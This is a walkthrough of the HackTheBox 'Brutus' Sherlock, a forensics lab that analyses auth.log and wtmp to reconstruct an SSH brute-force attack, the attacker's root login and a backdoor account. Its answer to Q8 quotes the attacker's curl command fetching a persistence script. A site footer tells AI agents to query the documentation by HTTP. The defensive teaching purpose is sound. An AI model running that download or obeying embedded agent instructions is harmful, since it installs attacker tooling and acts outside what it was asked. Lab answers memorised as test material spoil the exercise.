# Brutus

## **Sherlock Scenario**

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

Q1) Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

```bash
cat auth.log | grep -i "Failed Password"
```

<figure><img src="/files/sQd9eizcpfZsV5mjMjsv" alt=""><figcaption></figcaption></figure>

```bash
grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr
```

<figure><img src="/files/1SW5Y4SWNCKILBjK9OVa" alt=""><figcaption></figcaption></figure>

Answer:  65.2.161.68

Q2) The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?

```bash
grep "65.2.161.68" auth.log | grep -i "Accepted Password"
```

<figure><img src="/files/ZKn6xTDKVTIluPwuC1SD" alt=""><figcaption></figcaption></figure>

Answer:  root

Q3) Identify the timestamp when the attacker logged in manually to the server to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.

```bash
utmpdump wtmp | grep "root" -C 1
```

<figure><img src="/files/HbK9OEtx7hSUhVa1RZi9" alt=""><figcaption></figcaption></figure>

Answer:  2024-03-06 06:32:45

Q4) SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?

<figure><img src="/files/wx9g6hoAjfuOPKQc1Yb2" alt=""><figcaption></figcaption></figure>

Answer:  37

Q5) The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

```bash
grep -i "useradd" auth.log
```

<figure><img src="/files/5WOo3A3of2vP1p6x8LOK" alt=""><figcaption></figcaption></figure>

Answer:  cyberjunkie

Q6) What is the MITRE ATT\&CK sub-technique ID used for persistence by creating a new account?

<figure><img src="/files/nPA787gHk53DxcT7e0Z1" alt=""><figcaption></figcaption></figure>

Answer:  T1136.001

Q7) What time did the attacker's first SSH session end according to auth.log?

```bash
grep -i "session 37" auth.log
```

<figure><img src="/files/qSquCidVO5I6EWSqUAGG" alt=""><figcaption></figcaption></figure>

Answer:  2024-03-06 06:37:24

Q8) The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

```bash
grep -i "cyberjunkie" auth.log | grep -i "command"
```

<figure><img src="/files/7EugfVPBkoOH9RsXw8h5" alt=""><figcaption></figcaption></figure>

Answer:  /usr/bin/curl <https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://faresbltagy.gitbook.io/footprintinglabs/hackthebox-rooms/brutus.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.